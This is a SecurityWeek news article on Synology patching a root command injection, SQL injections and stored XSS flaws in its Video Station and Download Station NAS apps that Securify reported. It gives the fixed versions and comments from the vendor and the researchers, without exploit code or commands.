Virtual Event: Threat Detection and Incident Response Summit - Watch Sessions
Connect with us

Hi, what are you looking for?



Synology Patches Serious Flaws in NAS Software

Network attached storage (NAS) company Synology has released updates for its Video Station and Download Station applications to patch several vulnerabilities identified by Dutch security company Securify.

Network attached storage (NAS) company Synology has released updates for its Video Station and Download Station applications to patch several vulnerabilities identified by Dutch security company Securify.

Researchers uncovered a total of three vulnerabilities in Synology Video Station, a piece of software that allows users of Synology DiskStation NAS devices to easily organize and watch their videos.

One of the flaws is a command injection affecting the subtitle.cgi CGI script. The vulnerability can be exploited to execute arbitrary commands with root privileges, and compromise DiskStation NAS devices and all the data stored on them. If the “public share” feature is enabled (enabled by default), the vulnerability can be exploited remotely by an unauthenticated attacker.

Han Sahin, co-founder of Securify, told SecurityWeek that this high risk vulnerability can be exploited even if the public share feature is disabled by brute-forcing the parameters of the share URL. This is possible because there are no cryptographically strong random numbers

included in the vulnerable subtitle.cgi request. The expert has pointed out that the vulnerability is easiest to exploit in scenarios where users explicitly share a video with other users.

Securify has also identified two blind SQL injection vulnerabilities in Video Station. The flaws, found in the watchstatus.cgi and audiotrack.cgi CGI scripts, can be exploited to access the application’s PostgreSQL database server.

Sahin says these SQL injections have been rated “medium” because they can only be exploited by an authenticated attacker.

Advertisement. Scroll to continue reading.

The Video Station vulnerabilities were reported to Synology this summer. The vendor patched the audiotrack.cgi issue with the release of version 1.5-0757, but the other two issues were initially missed and they were only fixed later with the release of version 1.5-0763.

Securify also found multiple high severity persistent cross-site scripting (XSS) bugs in Download Station, an application that enables DiskStation devices to serve as a download center. Users can utilize Download Station to download files from BitTorrent, file hosting and other services.

Researchers discovered that the feature designed for creating download tasks by uploading files (e.g. a torrent file) exposes users to XSS attacks. Malicious actors can execute an XSS payload in the context of the application if they can trick victims into loading a specially crafted download file. A proof-of-concept (PoC) video from Securify shows how a malicious torrent file can be used to load an arbitrary website in an iframe.

A similar XSS was found in the feature that allows users to create download tasks by entering a URL or by using the BT Search feature to find torrent files. In vulnerable versions of Download Station, an attacker can deliver an XSS payload via a maliciously crafted URL.

Attackers can exploit these vulnerabilities to steal users’ session tokens, launch phishing attacks, redirect victims to arbitrary sites, and perform actions on their behalf.

The file upload vulnerability in Download Station was patched with the release of version 3.5-2962, and the URL issue was addressed several weeks later with the release of version 3.5-2967.

“Synology fixes reported security issues very fast. The attack surface of NAS software is however very big (almost uncontrollable) and that is why instances of similar issues are easily missed. Users should upgrade to the latest version of Download (v 3.5-2967) and Video Station (v 1.5-0763),” Sahin said.

Synology told SecurityWeek that it released the updates within a couple of days after receiving the vulnerability report.

“The issues have been resolved by applying the most recent application updates and operating system updates. For some time our systems have had a setting available to users to protect against cross-site attacks and as of the latest update this setting is now enabled by default. Synology takes security very seriously and we are constantly updating our applications to make sure our users are protected,” Synology said.

This was not the first time Securify discovered vulnerabilities in Synology software. In May, the security firm published advisories for flaws plaguing Synology DiskStation Manager, and Synology PhotoStation.

*Updated with statement from Synology

Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

SecurityWeek’s Threat Detection and Incident Response Summit brings together security practitioners from around the world to share war stories on breaches, APT attacks and threat intelligence.


Securityweek’s CISO Forum will address issues and challenges that are top of mind for today’s security leaders and what the future looks like as chief defenders of the enterprise.


Expert Insights

Related Content


Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...

Data Breaches

OpenAI has confirmed a ChatGPT data breach on the same day a security firm reported seeing the use of a component affected by an...

Risk Management

The supply chain threat is directly linked to attack surface management, but the supply chain must be known and understood before it can be...


The latest Chrome update brings patches for eight vulnerabilities, including seven reported by external researchers.


Patch Tuesday: Microsoft warns vulnerability (CVE-2023-23397) could lead to exploitation before an email is viewed in the Preview Pane.


Apple has released updates for macOS, iOS and Safari and they all include a WebKit patch for a zero-day vulnerability tracked as CVE-2023-23529.

IoT Security

A group of seven security researchers have discovered numerous vulnerabilities in vehicles from 16 car makers, including bugs that allowed them to control car...

Application Security

Drupal released updates that resolve four vulnerabilities in Drupal core and three plugins.